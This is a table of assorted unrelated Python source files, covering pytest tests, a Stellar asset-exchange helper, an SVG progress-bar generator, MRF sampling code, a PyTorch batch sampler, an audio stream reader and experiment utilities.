| id (string, 3-8 chars) | content (string, 100-981k chars) |
|---|---|
411345
|
import pytest
from kedro_mlflow.framework.cli.cli_utils import (
render_jinja_template,
write_jinja_template,
)
@pytest.fixture
def template_path(tmp_path):
return tmp_path / "template.py"
@pytest.fixture
def jinja_template(template_path):
with open(template_path, "w") as file_handler:
file_handler.write("fake file\n which contains {{ fake_tag }}. Nice, isn't it?")
return "fake file\n which contains 'Hello world!'. Nice, isn't it?"
@pytest.fixture
def cookiecutter_template(template_path):
with open(template_path, "w") as file_handler:
file_handler.write(
"fake file\n which contains {{ cookiecutter.fake_tag }}. Nice, isn't it?"
)
return "fake file\n which contains 'Hello world!'. Nice, isn't it?"
def test_render_jinja_template(template_path, jinja_template):
rendered = render_jinja_template(src=template_path, fake_tag="'Hello world!'")
assert rendered == jinja_template
def test_render_jinja_template_with_cookiecutter_tags(
template_path, cookiecutter_template
):
rendered = render_jinja_template(
src=template_path, fake_tag="'Hello world!'", is_cookiecutter=True
)
assert rendered == cookiecutter_template
def test_write_jinja_template(tmp_path, template_path, jinja_template):
rendered_path = tmp_path / "rendered.py"
write_jinja_template(
src=template_path, dst=rendered_path, fake_tag="'Hello world!'"
)
with open(rendered_path, "r") as file_handler:
rendered = file_handler.read()
assert rendered == jinja_template
def test_write_jinja_template_with_cookiecutter_tags(
tmp_path, template_path, cookiecutter_template
):
rendered_path = tmp_path / "rendered.py"
write_jinja_template(
src=template_path,
dst=rendered_path,
is_cookiecutter=True,
fake_tag="'Hello world!'",
)
with open(rendered_path, "r") as file_handler:
rendered = file_handler.read()
assert rendered == cookiecutter_template
|
411421
|
import pytest
from oval_graph.command_line_client.client import Client
from .constants_for_tests import PATH_TO_ARF_REPORT
def get_client(rule, optional_args=None):
path = str(PATH_TO_ARF_REPORT)
args = [path, rule]
if optional_args is not None:
args.extend(optional_args)
return Client(args)
def test_search_rules_id_not_implemented_error():
part_of_id_rule = 'xccdf_org.ssgproject.'
client = get_client(part_of_id_rule)
with pytest.raises(NotImplementedError):
assert client.search_rules_id()
def test_get_only_fail_rules_not_implemented_error():
part_of_id_rule = 'xccdf_org.ssgproject.'
client = get_client(part_of_id_rule)
with pytest.raises(NotImplementedError):
assert client.get_only_fail_rule(['rule-id'])
|
411443
|
class SVG_map:
"""
This class generates the SVG for the API response.
It initializes itself with a title, a total range, and progress, and
calculates the measurements needed to generate the SVG from this
information.
Attributes
----------
__title__ : str
title of the progress-bar
__title_width__ : int
width of title for svg
__total_width__ : int
total width of svg
__progress__ : int
percentage of progress
__progressbar_width__ : int
width of the progress-bar
__progress_color__ : str
color of the progress-bar depending on the percentage of progress
__green__ if progress > 66
__yellow__ if 66 >= progress > 33
__red__ if 33 >= progress > 0
__progress_details_x__ : int
position of progress details in X axis
__red__ : str
fill:rgb(240,113,120)
__yellow__ : str
fill:rgb(255,203,107)
__green__ : str
fill:rgb(195,232,141)
__keys__ : tuple of str
keys for the svg_data_list dictionary
Methods
-------
generate()
generates and returns the SVG
"""
def __init__(self, title="Prog", total=100, progress=30):
"""
Parameters
----------
title : str
title of the progress-bar
total : int
total range of work
progress : int
progress of the work
"""
self.__set_default__()
self.__title__ = title
self.__title_width__ = len(title) * 8.5 + 10
self.__total_width__ = self.__title_width__ + 70
self.__progress__ = int(progress / total * 100)
self.__progress__ = self.__progress__ if self.__progress__ <= 100 else 100
self.__progressbar_width__ = int(self.__progress__ / 100 * 70)
self.__progress_color__ = self.__get_progress_color__(self.__progress__)
self.__progress_details_x__ = self.__get_progress_details_x__(self.__progress__)
def __set_default__(self):
"""
sets default attributes
"""
self.__green__ = "#c3e88d"
self.__red__ = "#f07178"
self.__yellow__ = "#ffcb6b"
self.__keys__ = (
"start",
"title_rect",
"title",
"progress_box",
"progress_bar",
"progress_details",
"error_text",
"end",
)
def __get_progress_details_x__(self, progress):
"""
Parameters
----------
progress : int
percentage of progress
Returns
-------
int
position of progress details in X axis
"""
if progress <= 9:
return self.__title_width__ + 25
elif progress <= 99:
return self.__title_width__ + 20
return self.__title_width__ + 15
def __get_progress_color__(self, progress):
"""
Parameters
----------
progress: int
percentage of progress
Returns
-------
str
returns __green__, __yellow__ or __red__
"""
if progress <= 33:
return self.__red__
elif progress <= 66:
return self.__yellow__
return self.__green__
def generate(self):
"""
Returns
-------
str
generates and returns SVG data as a str
"""
svg_data = {
"start": '<svg xmlns="http://www.w3.org/2000/svg" width="'
+ str(self.__total_width__)
+ '" height="20">',
"title_rect": '<rect rx="3" width="'
+ str(self.__title_width__)
+ '" height="20" fill="#0f111a"/>',
"title": '<text x="5" y="14" fill="#c792ea" style="font:700 13px sans-serif">'
+ self.__title__
+ "</text>",
"progress_box": '<rect x="'
+ str(self.__title_width__ - 5)
+ '" rx="3" width="70" height="20" fill="#464b5d"/>',
"progress_bar": '<rect x="'
+ str(self.__title_width__ - 5)
+ '" rx="3" width="'
+ str(self.__progressbar_width__)
+ '" height="20" fill="'
+ self.__progress_color__
+ '"/>',
"progress_details": '<text x="'
+ str(self.__progress_details_x__)
+ '" y="14" class="txt" '
+ 'fill="#fff" style="align:center;font:13px sans-serif">'
+ str(self.__progress__)
+ "%</text>",
"error_text": "Sorry, your browser does not support inline SVG.",
"end": "</svg>",
}
svg_data_list = [svg_data[key] for key in self.__keys__]
return "".join(svg_data_list)
|
411452
|
from typing import Union, Optional, List
from django.utils.translation import gettext
from django.core.exceptions import ObjectDoesNotExist
from django.db.models import Q
from polaris.models import OffChainAsset, Asset, ExchangePair, DeliveryMethod
def asset_id_to_kwargs(asset_id: str) -> dict:
if asset_id.startswith("stellar"):
_, code, issuer = asset_id.split(":")
return {"code": code, "issuer": issuer}
else:
scheme, identifier = asset_id.split(":")
return {"scheme": scheme, "identifier": identifier}
def is_stellar_asset(asset: str) -> bool:
return asset.startswith("stellar")
def get_buy_assets(
sell_asset: Union[Asset, OffChainAsset],
buy_delivery_method: Optional[str],
country_code: Optional[str],
) -> List[Union[Asset, OffChainAsset]]:
asset_str = sell_asset.asset_identification_format
pairs = ExchangePair.objects.filter(sell_asset=asset_str).all()
if not pairs:
return []
buy_asset_strs = [p.buy_asset for p in pairs]
conditions = Q()
for asset_str in buy_asset_strs:
conditions |= Q(**asset_id_to_kwargs(asset_str))
if isinstance(sell_asset, Asset):
kwargs = {}
if country_code:
kwargs["country_codes__icontains"] = country_code
if buy_delivery_method:
kwargs["delivery_methods__type"] = DeliveryMethod.TYPE.buy
kwargs["delivery_methods__name"] = buy_delivery_method
buy_assets = (
OffChainAsset.objects.filter(conditions, **kwargs)
.prefetch_related("delivery_methods")
.all()
)
else:
if buy_delivery_method:
raise ValueError(
gettext(
"unexpected 'buy_delivery_method', "
"client intends to buy a Stellar asset"
)
)
buy_assets = Asset.objects.filter(conditions).all()
return list(buy_assets)
def get_buy_asset(
sell_asset: Union[Asset, OffChainAsset],
buy_asset_str: str,
buy_delivery_method: Optional[str],
country_code: Optional[str],
) -> Union[Asset, OffChainAsset]:
if isinstance(sell_asset, Asset):
kwargs = {}
try:
scheme, identifier = buy_asset_str.split(":")
except ValueError:
raise ValueError(gettext("invalid 'buy_asset' format"))
kwargs["scheme"] = scheme
kwargs["identifier"] = identifier
if country_code:
kwargs["country_codes__icontains"] = country_code
if buy_delivery_method:
kwargs["delivery_methods__type"] = DeliveryMethod.TYPE.buy
kwargs["delivery_methods__name"] = buy_delivery_method
try:
buy_asset = OffChainAsset.objects.prefetch_related("delivery_methods").get(
**kwargs
)
except ObjectDoesNotExist:
raise ValueError(
gettext(
"unable to find 'buy_asset' using the following filters: "
"'country_code', 'buy_delivery_method'"
)
)
else:
if buy_delivery_method:
raise ValueError(
gettext(
"unexpected 'buy_delivery_method', "
"client intends to buy a Stellar asset"
)
)
try:
_, code, issuer = buy_asset_str.split(":")
except ValueError:
raise ValueError(gettext("invalid 'buy_asset' format"))
try:
buy_asset = Asset.objects.get(code=code, issuer=issuer)
except ObjectDoesNotExist:
raise ValueError(
gettext(
"unable to find 'buy_asset' using the following filters: "
"'country_code', 'buy_delivery_method'"
)
)
if not ExchangePair.objects.filter(
sell_asset=sell_asset.asset_identification_format, buy_asset=buy_asset_str
).exists():
raise ValueError(gettext("unsupported asset pair"))
return buy_asset
def get_sell_asset(
sell_asset_str: str,
sell_delivery_method: Optional[str],
country_code: Optional[str],
) -> Union[Asset, OffChainAsset]:
try:
if is_stellar_asset(sell_asset_str):
if sell_delivery_method:
raise ValueError(
gettext(
"unexpected 'sell_delivery_method', "
"client intends to sell a Stellar asset"
)
)
try:
_, code, issuer = sell_asset_str.split(":")
except ValueError:
raise ValueError(gettext("invalid 'sell_asset' format"))
return Asset.objects.get(code=code, issuer=issuer)
else:
try:
scheme, identifier = sell_asset_str.split(":")
except ValueError:
raise ValueError(gettext("invalid 'sell_asset' format"))
kwargs = {}
if country_code:
kwargs["country_codes__icontains"] = country_code
if sell_delivery_method:
kwargs["delivery_methods__type"] = DeliveryMethod.TYPE.sell
kwargs["delivery_methods__name"] = sell_delivery_method
return OffChainAsset.objects.prefetch_related("delivery_methods").get(
scheme=scheme, identifier=identifier, **kwargs
)
except ObjectDoesNotExist:
raise ValueError(
gettext(
"no 'sell_asset' for 'delivery_method' and 'country_code' specificed"
)
)
def find_delivery_method(
asset: Union[Asset, OffChainAsset],
delivery_method_name: str,
delivery_method_type: str,
) -> Optional[DeliveryMethod]:
if isinstance(asset, Asset):
return None
if not delivery_method_name:
return None
delivery_method = None
for dm in asset.delivery_methods.all():
if dm.type != delivery_method_type:
continue
if dm.name == delivery_method_name:
delivery_method = dm
break
return delivery_method
|
411548
|
import brownie
import pytest
from brownie import chain
from eth_account import Account
from eth_account.messages import encode_structured_data
amount = 100
owner = Account.create()
spender = Account.create()
def generate_permit(vault, owner: Account, spender: Account, value, nonce, deadline):
data = {
"types": {
"EIP712Domain": [
{"name": "name", "type": "string"},
{"name": "version", "type": "string"},
{"name": "chainId", "type": "uint256"},
{"name": "verifyingContract", "type": "address"},
],
"Permit": [
{"name": "owner", "type": "address"},
{"name": "spender", "type": "address"},
{"name": "value", "type": "uint256"},
{"name": "nonce", "type": "uint256"},
{"name": "deadline", "type": "uint256"},
],
},
"domain": {
"name": vault.name(),
"version": vault.version(),
"chainId": 1, # ganache bug https://github.com/trufflesuite/ganache/issues/1643
"verifyingContract": str(vault),
},
"primaryType": "Permit",
"message": {
"owner": owner.address,
"spender": spender.address,
"value": value,
"nonce": nonce,
"deadline": deadline,
},
}
return encode_structured_data(data)
@pytest.mark.parametrize("expiry", [True, False])
def test_permit(vault, expiry):
nonce = vault.nonces(owner.address)
expiry = chain[-1].timestamp + 3600 if expiry else 0
permit = generate_permit(vault, owner, spender, amount, nonce, expiry)
signature = owner.sign_message(permit).signature
assert vault.allowance(owner.address, spender.address) == 0
vault.permit(owner.address, spender.address, amount, expiry, signature)
assert vault.allowance(owner.address, spender.address) == amount
def test_permit_wrong_signature(vault):
nonce = vault.nonces(owner.address)
expiry = 0
permit = generate_permit(vault, owner, spender, amount, nonce, expiry)
signature = spender.sign_message(permit).signature
assert vault.allowance(owner.address, spender.address) == 0
with brownie.reverts("dev: invalid signature"):
vault.permit(owner.address, spender.address, amount, expiry, signature)
def test_permit_expired(vault):
nonce = vault.nonces(owner.address)
expiry = chain[-1].timestamp - 600
permit = generate_permit(vault, owner, spender, amount, nonce, expiry)
signature = owner.sign_message(permit).signature
assert vault.allowance(owner.address, spender.address) == 0
with brownie.reverts("dev: permit expired"):
vault.permit(owner.address, spender.address, amount, expiry, signature)
|
411554
|
import json
from fastapi import FastAPI, status, Body
from fastapi.responses import PlainTextResponse
from yes_predictor import PythonPredictor
my_app = FastAPI()
my_app.ready = False
my_app.predictor = None
@my_app.on_event("startup")
def startup():
with open("predictor_config.json", "r") as f:
config = json.load(f)
my_app.predictor = PythonPredictor(config)
my_app.ready = True
@my_app.get("/healthz")
def healthz():
if my_app.ready:
return PlainTextResponse("ok")
return PlainTextResponse("service unavailable", status_code=status.HTTP_503_SERVICE_UNAVAILABLE)
@my_app.post("/")
def post_handler(payload: dict = Body(...)):
return my_app.predictor.predict(payload)
|
411576
|
import numpy as np
from utils import *
from exponential_families import load_nodes
import csv
import scipy.sparse as sps
def get_node_map(nodes):
'''Calculate the mapping from data column to node.'''
cols = []
for i,node in enumerate(nodes):
cols.extend([i]*node.num_params)
return np.array(cols)
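# Usage sketch (illustrative only; the fake node type below is a stand-in for
# an ExponentialFamily node exposing num_params): two nodes with 2 and 3
# parameters map the five sufficient-statistic columns to [0, 0, 1, 1, 1].
from collections import namedtuple
_FakeNode = namedtuple('FakeNode', 'num_params')
_example_node_map = get_node_map([_FakeNode(2), _FakeNode(3)])  # array([0, 0, 1, 1, 1])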
class MixedMRF:
def __init__(self, nodes, weights, neighbor_partitions):
self.nodes = nodes
self.weights = weights
self.neighbor_partitions = neighbor_partitions
self.obs_partitions = np.hstack([np.repeat(i, node.domain_size) for i, node in enumerate(nodes)])
self.ss_partitions = np.hstack([np.repeat(i, node.num_params) for i, node in enumerate(nodes)])
def calc_sufficient_statistics(self, data):
return np.hstack([node.sufficient_statistics(data[self.obs_partitions == i])[0] for i, node in enumerate(self.nodes)])
def gibbs_sample(self, start=None, verbose=False):
if start is None:
start = np.hstack([node.starting_x() for node in self.nodes])
if verbose:
print('Starting: {0}'.format(pretty_str(start)))
# Get the vector of sufficient statistics
sufficient_statistics = self.calc_sufficient_statistics(start)
if verbose:
print('suff statistics: {0}'.format(pretty_str(sufficient_statistics)))
# Create the resulting vector
result = np.copy(start)
for i,(node, weights) in enumerate(zip(self.nodes, self.weights)):
if verbose:
print('')
print('Node #{0}: {1}'.format(i, node))
print('Weights: {0}'.format(pretty_str(weights)))
# Calculate the natural parameters
eta = weights[:,1:].dot(sufficient_statistics[self.ss_partitions != i]) + weights[:,0]
if verbose:
print('Theta: {0}\nNatural params: {1}'.format(pretty_str(weights), pretty_str(eta)))
sample = node.sample(eta)
result[self.obs_partitions == i] = sample
sufficient_statistics[self.ss_partitions == i] = node.sufficient_statistics(sample)
if verbose:
print('gibbs sample: {0}'.format(pretty_str(result)))
return result
def save_neighbors(self, filename):
save_list_of_arrays(filename, self.neighbor_partitions, fmt='%1i')
def save_weights(self, filename):
save_list_of_arrays(filename, self.weights)
def save_edges(self, filename, rel_tol=1e-4):
with open(filename, 'w') as f:
writer = csv.writer(f)
for i, (weights, neigh_part) in enumerate(zip(self.weights,self.neighbor_partitions)):
for j in range(i, len(self.weights)):
w = weights[:,neigh_part == j]
if np.abs(w).max() > rel_tol:
writer.writerow([i,j] + list(w.flatten()))
class SparsePseudoMixedMRF:
'''A sparse mixed MRF that uses the pseudo-likelihood to calculate the joint log-partition.'''
def __init__(self, nodes, edges):
self.nodes = nodes # list of ExponentialFamily objects
self.edges = edges # a list where each element is a tuple ((i,j), weight)
self.node_map = get_node_map(nodes)
self.jll = None
# Calculate the neighbors of each node and create the weight vectors
self.neighbors = [[] for _ in nodes]
self.weights = [[[0.] for _ in range(node.num_params)] for node in nodes] # Reserve the first weight for the bias term
self.weights_map = {}
for (i,j), w in edges:
inode = nodes[i]
# If this is the bias term
if i == j:
for k in range(inode.num_params):
self.weights[i][k][0] = w[k]
self.weights_map[(i,j)] = w
continue
# If this is an edge between neighbors
jnode = nodes[j]
w = w.reshape((inode.num_params, jnode.num_params))
self.neighbors[i].append(j)
self.neighbors[j].append(i)
for k in range(inode.num_params):
self.weights[i][k].extend(w[k])
for k in range(jnode.num_params):
self.weights[j][k].extend(w.T[k])
self.weights_map[(i,j)] = w
self.weights_map[(j,i)] = w.T
self.neighbors = [np.array(x) for x in self.neighbors]
self.weights = [np.array(x) for x in self.weights]
def set_data(self, data):
'''Set the sufficient statistics data to be used.'''
assert(data.shape[1] == len(self.node_map))
self.data = data
self.dirty = True
def joint_log_likelihood(self):
'''Calculates the joint log-pseudo-likelihood'''
if self.dirty:
result = 0.
for i, node in enumerate(self.nodes):
result += self.node_log_likelihood(i, node)
self.jll = result
return self.jll
def node_log_likelihood(self, node_id, node):
neighbors = self.neighbors[node_id]
# Figure out which columns can safely be deleted since they're unused
target_cols = np.where(self.node_map == node_id)[0]
neighbor_cols = np.where(np.in1d(self.node_map, neighbors))[0]
unused = np.delete(np.arange(self.data.shape[1]), np.hstack([target_cols, neighbor_cols]))
# Rearrange the data so that sufficient statistics of this node come first and any non-neighbor nodes are removed
neighbors_partition = np.hstack([[node_id], np.delete(self.node_map, unused)]).astype(np.int32)
c = np.delete(np.arange(self.data.shape[1]), unused)
data_subset = self.data[:, c]
weights = self.weights[node_id] # p x q+1
sufficient_stats = data_subset[:,0:node.num_params] # n x p
neighbor_stats = data_subset[:,node.num_params:] # n x q
# The results matrix is n x p, where n = # examples and p = # natural parameters for this node
results = np.zeros((sufficient_stats.shape[0], node.num_params))
# Add all the natural parameters
for i, w in enumerate(weights):
# Handle nodes without edges
if w.shape[0] < 2:
continue
if sps.issparse(sufficient_stats):
ss = sufficient_stats[:,i].A[:,0]
else:
ss = sufficient_stats[:,i]
results[:,i] += sps.diags(ss, 0).dot(neighbor_stats).dot(w[1:][:,np.newaxis])[:,0]
results[:,i] += ss * w[0]
# Calculate the log-partition function for each example
a = node.log_partition(results.T)
return results.sum() - a.sum()
def load_sparse_pseudomrf(experiment_dir, edges_path='edges/and_mle_edges.csv'):
if not experiment_dir.endswith('/'):
experiment_dir += '/'
nodes = load_nodes(experiment_dir + 'data/nodes.csv')
edges = load_edges(experiment_dir + edges_path)
return SparsePseudoMixedMRF(nodes, edges)
|
411645
|
r = input()
s = input()
a = r.split(",")
b = s.split(",")
count = sum(int(x) for x in b)
for j in a:
n = j.split(":")
if count == int(n[0]):
count = int(n[1])
if count >= 100:
print("Yes", end="")
else:
print("No", end="")
|
411669
|
import argparse
import json
from collections import Counter
from datetime import datetime
import pendulum
import requests
from github import Github
from .config import (
FOREST_CLAENDAR_URL,
FOREST_ISSUE_NUMBER,
FOREST_LOGIN_URL,
FOREST_SUMMARY_HEAD,
FOREST_SUMMARY_STAT_TEMPLATE,
FOREST_TAG_URL,
FOREST_URL_HEAD,
)
class Forst:
def __init__(self, email, password):
self.email = email
self.password = password
self.s = requests.Session()
self.year = datetime.now().year
self.user_id = None
self.plants = []
self.log_days = []
self.success_plants_count = 0
self.is_login = False
def login(self):
data = {"session": {"email": self.email, "password": <PASSWORD>}}
headers = {"Content-Type": "application/json"}
r = self.s.post(FOREST_LOGIN_URL, headers=headers, data=json.dumps(data))
if not r.ok:
raise Exception(f"Someting is wrong to login -- {r.text}")
self.user_id = r.json()["user_id"]
self.is_login = True
def make_plants_data(self):
date = str(self.year) + "-01-01"
r = self.s.get(FOREST_CLAENDAR_URL.format(date=date, user_id=self.user_id))
if not r.ok:
raise LoadError(f"Someting is wrong to get data-- {r.text}")
self.plants = r.json()["plants"]
# only count success trees
self.plants = [i for i in self.plants if i["is_success"]]
self._make_forest_dict()
def _get_my_tags(self):
r = self.s.get(FOREST_TAG_URL.format(user_id=self.user_id))
if not r.ok:
raise Exception("Can not get tags")
tag_list = r.json().get("tags", [])
tag_dict = {}
for t in tag_list:
tag_dict[t["tag_id"]] = t["title"]
return tag_dict
def make_year_stats(self):
if not self.is_login:
raise Exception("Please login first")
self.make_plants_data()
def _make_forest_dict(self):
if not self.plants:
self.make_plants_data()
tags_dict = self._get_my_tags()
d = Counter()
for p in self.plants:
d[tags_dict[p.get("tag")]] += 1
return d
@staticmethod
def _make_tag_summary_str(tag_summary_dict, unit):
s = FOREST_SUMMARY_HEAD
for k, v in tag_summary_dict.most_common():
s += FOREST_SUMMARY_STAT_TEMPLATE.format(tag=k, times=str(v) + f" {unit}")
return s
def make_new_table(self, token, repo_name, issue_number=FOREST_ISSUE_NUMBER):
u = Github(token)
issue = u.get_repo(repo_name).get_issue(issue_number)
unit = "个"
body = ""
tag_summary_dict = self._make_forest_dict()
for b in issue.body.splitlines():
if b.startswith("|"):
break
body += b
body = body + "\r\n" + self._make_tag_summary_str(tag_summary_dict, unit)
issue.edit(body=body)
def make_forst_daily(self):
end_date = pendulum.now("Asia/Shanghai")
start_date = end_date.start_of("year")
self.make_year_stats()
log_days = set(
[
pendulum.parse(i["created_at"], tz="Asia/Shanghai").to_date_string()
for i in self.plants
]
)
self.log_days = sorted(list(log_days))
total_plants = len(self.plants)
is_today_check = False
if end_date.to_date_string() in self.log_days:
is_today_check = True
periods = list(pendulum.period(start_date, end_date.subtract(days=1)))
periods.sort(reverse=True)
# count today toward the streak if it is already done
streak = 0
if end_date.to_date_string() in self.log_days:
streak += 1
# walk backwards day by day; the streak ends at the first missing day
for p in periods:
if p.to_date_string() not in self.log_days:
break
streak += 1
# total plants, streak, is_today_check
return len(self.plants), streak, is_today_check
def get_forst_daily(email, password, github_token, repo_name):
f = Forst(email, password)
f.login()
# also edit the issue body
f.make_new_table(github_token, repo_name)
return f.make_forst_daily()
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("email", help="email")
parser.add_argument("password", help="password")
parser.add_argument("github_token", help="github_token")
parser.add_argument("repo_name", help="repo_name")
options = parser.parse_args()
f = Forst(options.email, options.password)
f.login()
f._make_forest_dict()
print(f.make_new_table(options.github_token, options.repo_name))
|
411698
|
from pyui.geom import Size
from .base import View
class Rectangle(View):
def content_size(self, available: Size):
return available
|
411704
|
from typing import Iterable
import math
import numpy as np
from torch.utils.data import Sampler, BatchSampler
class SortishSampler(Sampler):
"""Returns indices such that inputs with similar lengths are close together."""
def __init__(self, sequence_lengths: Iterable, bucket_size: int, num_replicas: int = 1, rank: int = 0):
self.data = np.argsort(sequence_lengths)
self.num_replicas = num_replicas
self.num_samples = int(math.ceil(len(self.data) * 1.0 / self.num_replicas))
self.bucket_size = bucket_size
n_buckets = int(np.ceil(len(self.data) / self.bucket_size))
self.data = [self.data[i * bucket_size: i * bucket_size + bucket_size] for i in range(n_buckets)]
self.rank = rank
self.epoch = 0
self.total_size = self.num_samples * self.num_replicas
def __iter__(self):
np.random.seed(self.epoch)
for bucket in self.data:
np.random.shuffle(bucket)
np.random.shuffle(self.data)
indices = [item for sublist in self.data for item in sublist]
indices += indices[:(self.total_size - len(indices))]
assert len(indices) == self.total_size
# subsample
start = self.rank * self.num_samples
end = start + self.num_samples
indices = indices[start:end]
assert len(indices) == self.num_samples
return iter(indices)
def __len__(self):
return self.num_samples
def set_epoch(self, epoch):
self.epoch = epoch
class ApproxBatchSampler(BatchSampler):
"""
Parameters:
-----------
sampler : Pytorch Sampler
Choose base sampler class to use for bucketing
max_tokens : int
Maximum number of tokens per batch
max_batch: int
Maximum batch size
sample_lengths : array-like
List of lengths of sequences in the order of the dataset
"""
def __init__(self, sampler, max_tokens, max_batch, sample_lengths, max_square_tokens=np.inf):
self.longest_token = 0
self.max_tokens = max_tokens
self.max_batch = max_batch
self.sampler = sampler
self.sample_lengths = sample_lengths
self.max_square_tokens = max_square_tokens
def __iter__(self):
batch = []
length = 0
ell_sq = 0
for idx in self.sampler:
this_length = self.sample_lengths[idx]
linear = (len(batch) + 1) * max(length, this_length)
quadratic = (len(batch) + 1) * max(ell_sq, this_length ** 2)
if linear <= self.max_tokens and quadratic < self.max_square_tokens:
batch.append(idx)
length = max(length, this_length)
ell_sq = max(ell_sq, this_length ** 2)
if len(batch) == self.max_batch:
yield batch
batch = []
length = 0
else:
yield batch
batch = [idx]
length = this_length
ell_sq = this_length ** 2
if len(batch) > 0:
yield batch
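# Usage sketch (illustrative only; the lengths, bucket size and token budget
# below are arbitrary): bucket indices by sequence length, then pack them into
# batches under a maximum-token budget.
_example_lengths = [5, 12, 7, 30, 18, 9, 25, 3]
_base_sampler = SortishSampler(_example_lengths, bucket_size=4)
_example_batches = list(ApproxBatchSampler(_base_sampler, max_tokens=64, max_batch=4, sample_lengths=_example_lengths))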
|
411708
|
import time
import pyaudio
import numpy as np
from threading import Thread, Lock
class SoundStream(object):
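# Captures audio input via PyAudio on a background thread and exposes the peak
# sample value of the most recent chunk through read().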
def __init__(self, src=0):
self.started = False
self.read_lock = Lock()
self.sound = 0
self.chunk = np.zeros(1024, dtype=np.int16)
self.p = pyaudio.PyAudio()
input_index = self.get_channels(self.p)
self.channels = 1
self.rate = 16000
self.format = pyaudio.paInt16
self.stream = self.p.open(
format=self.format,
channels=self.channels,
rate=self.rate,
input_device_index = input_index,
input=True,
stream_callback=self.callback)
def start(self):
if self.started:
print("already started!!")
return None
self.started = True
self.thread = Thread(target=self.update, args=())
self.thread.start()
return self
def update(self):
while self.started:
self.read_lock.acquire()
self.sound = int(self.chunk.max())
self.read_lock.release()
def read(self):
self.read_lock.acquire()
sound = self.sound
self.read_lock.release()
return sound
def stop(self):
self.started = False
self.thread.join()
def __exit__(self, exc_type, exc_value, traceback):
self.stream.stop_stream()
self.stream.close()
self.p.terminate()
def get_channels(self, p):
output_index = self.p.get_default_input_device_info()['index']
for idx in range(self.p.get_device_count()):
info = self.p.get_device_info_by_index(idx)
if 'BlackHole' in info['name']:
output_index = info['index']
return output_index
def callback(self, in_data, frame_count, time_info, status):
self.chunk = np.frombuffer(in_data, np.int16).copy()
return (in_data, pyaudio.paContinue)
|
411709
|
import runpy
from setuptools import setup, find_packages
__version__ = runpy.run_path("torch_em/__version__.py")["__version__"]
# NOTE requirements are not all available via pip, you need to use conda,
# see 'environment_gpu.yaml' / 'environment_cpu.yaml'
requires = [
"torch",
"h5py"
]
setup(
name="torch_em",
packages=find_packages(exclude=["test"]),
version=__version__,
author="<NAME>",
install_requires=requires,
url="https://github.com/constantinpape/torch-em",
license="MIT",
entry_points={
"console_scripts": [
"torch_em.export_bioimageio_model = torch_em.util.modelzoo:main",
"torch_em.validate_checkpoint = torch_em.util.validation:main",
"torch_em.submit_slurm = torch_em.util.submit_slurm:main",
]
}
)
|
411763
|
import json
import logging
import numpy as np
import os
from scipy.special import logsumexp
from time import time
from __init__ import project_root
from data_handlers.data_providers import load_data_providers, DataProvider
from utils.plot_utils import disp_imdata
from utils.project_constants import IMG_DATASETS
def get_waymark_data_dir(seq_id, dataset_name, current=True):
if current:
return project_root + "waymark_data/{}/id{}/".format(dataset_name, seq_id)
else:
return project_root + "waymark_data/{}/old/id{}/".format(dataset_name, seq_id)
def get_metrics_data_dir(model_save_dir, epoch_i=None):
if epoch_i is None:
metrics_save_dir = os.path.join(model_save_dir, "metrics/")
else:
metrics_save_dir = os.path.join(model_save_dir, "metrics/epoch_{}/".format(epoch_i))
os.makedirs(metrics_save_dir, exist_ok=True)
return metrics_save_dir
def make_logger():
logger = logging.getLogger("tf")
logger.setLevel(logging.DEBUG)
# create console handler
ch = logging.StreamHandler()
ch.setLevel(logging.DEBUG)
formatter = logging.Formatter('%(asctime)s - %(message)s')
ch.setFormatter(formatter)
logger.addHandler(ch)
logger.propagate = False
def set_logger(log_path):
"""Sets the logger to log info in terminal and file `log_path`.
In general, it is useful to have a logger so that every output to the terminal is saved
in a permanent file. Here we save it to `model_dir/train.log`.
Taken from https://github.com/cs230-stanford/cs230-code-examples/blob/master/tensorflow/nlp/model/utils.py
Example:
```
logging.info("Starting training...")
```
Args:
log_path: (string) where to log
"""
logger = logging.getLogger()
logger.setLevel(logging.INFO)
if not logger.handlers:
# Logging to a file
file_handler = logging.FileHandler(log_path)
file_handler.setFormatter(logging.Formatter('%(asctime)s:%(levelname)s: %(message)s'))
logger.addHandler(file_handler)
# Logging to console
stream_handler = logging.StreamHandler()
stream_handler.setFormatter(logging.Formatter('%(message)s'))
logger.addHandler(stream_handler)
# noinspection PyUnresolvedReferences
def check_early_stopping(saver, sess, save_path, config):
val_loss = config["current_val_loss"]
best_val_loss = config["best_val_loss"]
saved = False
if val_loss and val_loss < best_val_loss:
config.best_val_loss = val_loss
config.n_epochs_until_stop = config.patience
saver.save(sess, save_path)
saved = True
do_break = False
val_loss_is_nan = val_loss and np.isnan(val_loss)
if (config.n_epochs_until_stop <= 0) or val_loss_is_nan:
do_break = True
return do_break, saved
def update_time_avg(config, pre_sample_time, time_key, counter_key):
"""Update a running average of a time stored in config[time_key].
This is useful for tracking the average time spent on an operation
performed multiple times during learning e.g sampling noise once an epoch"""
new_time = time() - pre_sample_time
cur_mean_time, num = config.get(time_key, 0), config.get(counter_key, 0)
config[time_key] = (num * cur_mean_time + new_time) / (num + 1)
config[counter_key] = num + 1
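# Usage sketch (illustrative only; the config dict and key names are arbitrary):
_example_config = {}
_pre = time()
update_time_avg(_example_config, _pre, "mean_noise_sample_time", "n_noise_samples")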
def get_mcmc_intervals(mcmc_params):
start, stop, num, thinning_factor = mcmc_params
step_sizes = np.linspace(start, stop, num) ** 2
return [[2, thinning_factor, s] for s in step_sizes]
def seperately_permute_matrix_cols(X, transpose=False):
if transpose: X = X.T
X = X[..., np.newaxis] # (n, d, 1)
X = DataProvider.independent_sliced_shuffle(X) # (n, d, 1)
X = np.squeeze(X, axis=-1) # (n, d)
if transpose: X = X.T
return X
def save_config(config, save_dir=None):
if not save_dir:
save_dir = config["save_dir"]
os.makedirs(save_dir, exist_ok=True)
# ensure that there are no np.floats, np.ints or np.ndarrays since they aren't serializable
is_np_float = lambda x: isinstance(x, (np.float32, np.float64))
is_np_int = lambda x: isinstance(x, (np.int32, np.int64))
bad_keys = []
for key, val in config.items():
if is_np_float(val):
config[key] = float(val)
elif is_np_int(val):
config[key] = int(val)
elif isinstance(val, list) and is_np_float(val[0]):
config[key] = [float(v) for v in val]
elif isinstance(val, list) and is_np_int(val[0]):
config[key] = [int(v) for v in val]
elif isinstance(val, np.ndarray): # don't save arrays
bad_keys.append(key)
for key in bad_keys:
del config[key]
with open(save_dir + "/config.json", 'w') as fp:
json.dump(config, fp, indent=4)
# noinspection PyUnresolvedReferences
